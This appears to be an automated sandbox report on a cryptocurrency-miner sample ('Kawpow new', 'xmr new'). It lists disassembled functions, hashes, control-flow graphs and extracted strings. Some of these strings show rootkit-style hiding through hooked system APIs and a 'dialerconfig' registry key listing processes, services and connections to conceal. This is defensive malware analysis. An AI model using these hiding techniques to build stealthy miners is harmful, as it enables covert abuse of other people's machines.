                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: a72cf43a30f49d6095cee7d994a7b6c78d4a69675b173fba3c57c6c244533bf7
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 9931AD322097418BEB14DF11E86C71A37ADF348B89F168194EE5E03BA8DB38CD41C726
                          Function 0000027E82482058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: f9ad87cd0163af3215299d396aca5d665c15b7b174453e07fdbb6e30be1fb1ab
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: C1D14632728A8089EB11CF75D4443ED37B9F348B98F194256CE5EA7BA9DA34C846C371
                          Function 0000027E82482980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: f8c3b906ba4ea1a476e87ab9cfaf369647cfe41322a82df934faf8283cfcb51b
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: 5991B63272869085FF60DF7594483AE2BA8B74DB89F19414ADE0E776A5DB34CC42C732
                          Function 0000027E8247253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 84d24e45938111ea6151c3b5d5a10f5e9e636bbe1acd3e2595c1c74b5e3f52fa
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 4971E436208B8949EF34DE2599483AB67E8F38DB84F4A0057DD2D53BA9DA34CE41C731
                          Function 0000027E82329E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 54c1463dec9ecac5e389b84d9d4c6094614e7dcc82620cb40853520d1f6a4d02
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 5861CD33608B858EEB20CF65D05439E77A8F348B89F158255EF4D17BA8DB38D894C721
                          Function 0000027E82472330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: 899993287a524ea751eecffad9dff68201a8343ffa9837ce628f9db6e3d222fc
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: F551283220C78989EE74CA29A06C3AB67D9F38D744F4E0166DD6D13B69DA39CD04C772
                          Function 0000027E824826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: fecd31e7717012afdb553d6c92a1f250921db66021e19d878a9bfeddfde18a57
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: 5841E832329A8086DF60CF25E44839B77A4F38C794F554122EE4D977A4EB3CC801C761
                          Function 0000027E824794A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: cf110e6f90d2eb9ffaa5358b20cb6676eeee8804735a79ae29b1245cd7ed8ebe
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: 84111932218B8482EF618F29E44825A77E9F788B94F5D4260EA9C07768DF38C951CB21
                          Function 0000027E82327356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 347dae61d650896506311116a2c6a29cc5d893e491be5346607617923156cd40
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 7BE08661644B4991DF018F21E85429933A4DB5CB64B49D162995C06331FA38D6E9C311
                          Function 0000027E823273B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: ede72b90f6e278bb6fc0db8ed007ca2590a42f50c2f077050b399dbc3c5c0816
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 7FE08661604B4985DF018F21E4541997364EB5CB54B89D162C94C06331EA38D6E5C311
                          Function 0000027E82471BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: bc306bcfdac00f1bbd008edcb8f6a429a2ea39b269d853a96f8084b2326c8889
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: 8511BF25A15B4889EF44CB66A80822A73A8FB8DFC0F0E4064CE5E53776DF38C842D320
                          Function 0000027E82471268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: 6b6507cf1087ef59c63614d79ddecb2b99b24c00feded8b5597b2131e7bbad0a
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: C0E03935A2160486EB458B62D80836A36E5EB8DF06F0A802489190B362EF7D8899C771

                          Execution Graph

                          Execution Coverage:0.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 14774 12c42a83844 14775 12c42a83866 14774->14775 14776 12c42a83851 StrCmpNIW 14774->14776 14776->14775

                          Executed Functions

                          Function 0000012C42A83844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 12c42a83844-12c42a8384f 1 12c42a83869-12c42a83870 0->1 2 12c42a83851-12c42a83864 StrCmpNIW 0->2 2->1 3 12c42a83866 2->3 3->1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID: dialer
                          • API String ID: 0-3528709123
                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction ID: 7eb45649479b34a9df7f298d22e6ae11392ad7005ee9e82459a449d7f5cbe8d1
                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction Fuzzy Hash: E1D0A77039168586FF54FFA788EA6EA6352EB04B44F8C5122CF1041150EB188DAEE751
                          Function 0000012C42A3273C Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: 64364bef4824b1453e48b5494702ed2600e375624101b07d3b4667038ba7c1fa
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 1161F332B416D087EB54EF1590227AEB393F754BA8F588122DF5907788DE38DC62C781
                          Function 00007FF652D51140 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 52 7ff652d51140-7ff652d51151 call 7ff652d51160
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217462901.00007FF652D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF652D50000, based on PE: true
                          • Associated: 00000016.00000002.2217350729.00007FF652D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000016.00000002.2217609995.00007FF652D5C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000016.00000002.2217781693.00007FF652D5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000016.00000002.2217867173.00007FF652D60000.00000008.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000016.00000002.2220313403.00007FF653254000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000016.00000002.2220423643.00007FF65328C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_7ff652d50000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction ID: cbe6f86d63ffad3c42d6a0bf972cd2c12e74e05e703c4db04e493fa3fbcdc03e
                          • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction Fuzzy Hash: 0CB01231F0530D84E3002F15DC413593260EF08749F540330C40C63352CEFD90408B30

                          Non-executed Functions

                          Function 0000012C42A82B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 301 12c42a82b2c-12c42a82ba5 call 12c42aa2ce0 304 12c42a82bab-12c42a82bb1 301->304 305 12c42a82ee0-12c42a82f03 301->305 304->305 306 12c42a82bb7-12c42a82bba 304->306 306->305 307 12c42a82bc0-12c42a82bc3 306->307 307->305 308 12c42a82bc9-12c42a82bd9 GetModuleHandleA 307->308 309 12c42a82bdb-12c42a82beb GetProcAddress 308->309 310 12c42a82bed 308->310 311 12c42a82bf0-12c42a82c0e 309->311 310->311 311->305 313 12c42a82c14-12c42a82c33 StrCmpNIW 311->313 313->305 314 12c42a82c39-12c42a82c3d 313->314 314->305 315 12c42a82c43-12c42a82c4d 314->315 315->305 316 12c42a82c53-12c42a82c5a 315->316 316->305 317 12c42a82c60-12c42a82c73 316->317 318 12c42a82c75-12c42a82c81 317->318 319 12c42a82c83 317->319 320 12c42a82c86-12c42a82c8a 318->320 319->320 321 12c42a82c9a 320->321 322 12c42a82c8c-12c42a82c98 320->322 323 12c42a82c9d-12c42a82ca7 321->323 322->323 324 12c42a82d9d-12c42a82da1 323->324 325 12c42a82cad-12c42a82cb0 323->325 326 12c42a82da7-12c42a82daa 324->326 327 12c42a82ed2-12c42a82eda 324->327 328 12c42a82cc2-12c42a82ccc 325->328 329 12c42a82cb2-12c42a82cbf call 12c42a8199c 325->329 330 12c42a82dbb-12c42a82dc5 326->330 331 12c42a82dac-12c42a82db8 call 12c42a8199c 326->331 327->305 327->317 333 12c42a82cce-12c42a82cdb 328->333 334 12c42a82d00-12c42a82d0a 328->334 329->328 338 12c42a82df5-12c42a82df8 330->338 339 12c42a82dc7-12c42a82dd4 330->339 331->330 333->334 341 12c42a82cdd-12c42a82cea 333->341 335 12c42a82d3a-12c42a82d3d 334->335 336 12c42a82d0c-12c42a82d19 334->336 343 12c42a82d4b-12c42a82d58 lstrlenW 335->343 344 12c42a82d3f-12c42a82d49 call 12c42a81bbc 335->344 336->335 342 12c42a82d1b-12c42a82d28 336->342 347 12c42a82e05-12c42a82e12 lstrlenW 338->347 348 12c42a82dfa-12c42a82e03 call 12c42a81bbc 338->348 339->338 346 12c42a82dd6-12c42a82de3 339->346 349 12c42a82ced-12c42a82cf3 341->349 352 12c42a82d2b-12c42a82d31 342->352 354 12c42a82d5a-12c42a82d64 343->354 355 12c42a82d7b-12c42a82d8d call 12c42a83844 343->355 344->343 359 12c42a82d93-12c42a82d98 344->359 356 12c42a82de6-12c42a82dec 346->356 350 12c42a82e14-12c42a82e1e 347->350 351 12c42a82e35-12c42a82e3f call 12c42a83844 347->351 348->347 366 12c42a82e4a-12c42a82e55 348->366 358 12c42a82cf9-12c42a82cfe 349->358 349->359 350->351 360 12c42a82e20-12c42a82e33 call 12c42a8152c 350->360 361 12c42a82e42-12c42a82e44 351->361 352->359 362 12c42a82d33-12c42a82d38 352->362 354->355 365 12c42a82d66-12c42a82d79 call 12c42a8152c 354->365 355->359 355->361 356->366 367 12c42a82dee-12c42a82df3 356->367 358->334 358->349 359->361 360->351 360->366 361->327 361->366 362->335 362->352 365->355 365->359 372 12c42a82e57-12c42a82e5b 366->372 373 12c42a82ecc-12c42a82ed0 366->373 367->338 367->356 377 12c42a82e5d-12c42a82e61 372->377 378 12c42a82e63-12c42a82e7d call 12c42a885c0 372->378 373->327 377->378 380 12c42a82e80-12c42a82e83 377->380 378->380 383 12c42a82e85-12c42a82ea3 call 12c42a885c0 380->383 384 12c42a82ea6-12c42a82ea9 380->384 383->384 384->373 386 12c42a82eab-12c42a82ec9 call 12c42a885c0 384->386 386->373
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 24d5473e73a1e6d201f3aef239ece9bdc289af09ab6fb3abb8e630c228cdd45f
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: 63B17B76250AD086FB68AF25D8627EE67A6FB44B88F045017EF0953794EF34CC62C781
                          Function 0000012C42A87D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: f3d84bb24efc054f454bbf40d14d68741f61f3065c39adb9398ba2eb05f0d9fd
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: FB318D76245BC08AFB60AF61E8A13EE7361F784744F44442ADB4D47B98EF38C559CB40
                          Function 0000012C42A8D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: ffc510297ffbb1d459223f28bbc91d92f5c8cf18e734e85cd1303e97c41cd9c1
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: 55316A36254BC086EB60AB25E8913DE73A1F788794F540526EF9D43B98EF38C166CB41
                          Function 0000012C42A81628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction ID: 76189dad7000d06fbca8ec999f6a80c8827b98dcc41b9fc24fea0cd4149c444a
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: E2712C36350A9085FB10BF22E8A66DE2376FB84B88F445522DF4E57B28EF34C465C781
                          Function 0000012C42A812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: d57b426fe4380037e82cec8a3b038173de63fa4e4fbcc220b3c9836ddf264571
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 20514972640B8486FB50DF62E46939F67A2F788FC9F584526DF4A07728DF38C0698B41
                          Function 0000012C42A81D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: dd6edee3eee0cd0d2d4fe47d8dce7a9ecadb5d750b604badc92b1e9c6ab6633b
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: 623177742809C6A0FA45FF66EC776EE6323FB44348F8058139F09535659E3886BAD3D2
                          Function 0000012C42A36910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 12c42a36910-12c42a36916 148 12c42a36951-12c42a3695b 147->148 149 12c42a36918-12c42a3691b 147->149 150 12c42a36a78-12c42a36a8d 148->150 151 12c42a3691d-12c42a36920 149->151 152 12c42a36945-12c42a36984 call 12c42a36fc0 149->152 156 12c42a36a8f 150->156 157 12c42a36a9c-12c42a36ab6 call 12c42a36e54 150->157 154 12c42a36922-12c42a36925 151->154 155 12c42a36938 __scrt_dllmain_crt_thread_attach 151->155 167 12c42a36a52 152->167 168 12c42a3698a-12c42a3699f call 12c42a36e54 152->168 159 12c42a36931-12c42a36936 call 12c42a36f04 154->159 160 12c42a36927-12c42a36930 154->160 163 12c42a3693d-12c42a36944 155->163 161 12c42a36a91-12c42a36a9b 156->161 170 12c42a36aef-12c42a36b20 call 12c42a37190 157->170 171 12c42a36ab8-12c42a36aed call 12c42a36f7c call 12c42a36e1c call 12c42a37318 call 12c42a37130 call 12c42a37154 call 12c42a36fac 157->171 159->163 173 12c42a36a54-12c42a36a69 167->173 180 12c42a369a5-12c42a369b6 call 12c42a36ec4 168->180 181 12c42a36a6a-12c42a36a77 call 12c42a37190 168->181 182 12c42a36b22-12c42a36b28 170->182 183 12c42a36b31-12c42a36b37 170->183 171->161 200 12c42a36a07-12c42a36a11 call 12c42a37130 180->200 201 12c42a369b8-12c42a369dc call 12c42a372dc call 12c42a36e0c call 12c42a36e38 call 12c42a3ac0c 180->201 181->150 182->183 184 12c42a36b2a-12c42a36b2c 182->184 185 12c42a36b7e-12c42a36b94 call 12c42a3268c 183->185 186 12c42a36b39-12c42a36b43 183->186 190 12c42a36c1f-12c42a36c2c 184->190 208 12c42a36bcc-12c42a36bce 185->208 209 12c42a36b96-12c42a36b98 185->209 191 12c42a36b4f-12c42a36b5d call 12c42a45780 186->191 192 12c42a36b45-12c42a36b4d 186->192 197 12c42a36b63-12c42a36b78 call 12c42a36910 191->197 212 12c42a36c15-12c42a36c1d 191->212 192->197 197->185 197->212 200->167 221 12c42a36a13-12c42a36a1f call 12c42a37180 200->221 201->200 250 12c42a369de-12c42a369e5 __scrt_dllmain_after_initialize_c 201->250 210 12c42a36bd0-12c42a36bd3 208->210 211 12c42a36bd5-12c42a36bea call 12c42a36910 208->211 209->208 217 12c42a36b9a-12c42a36bbc call 12c42a3268c call 12c42a36a78 209->217 210->211 210->212 211->212 231 12c42a36bec-12c42a36bf6 211->231 212->190 217->208 242 12c42a36bbe-12c42a36bc6 call 12c42a45780 217->242 239 12c42a36a21-12c42a36a2b call 12c42a37098 221->239 240 12c42a36a45-12c42a36a50 221->240 236 12c42a36c01-12c42a36c11 call 12c42a45780 231->236 237 12c42a36bf8-12c42a36bff 231->237 236->212 237->212 239->240 249 12c42a36a2d-12c42a36a3b 239->249 240->173 242->208 249->240 250->200 251 12c42a369e7-12c42a36a04 call 12c42a3abc8 250->251 251->200
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
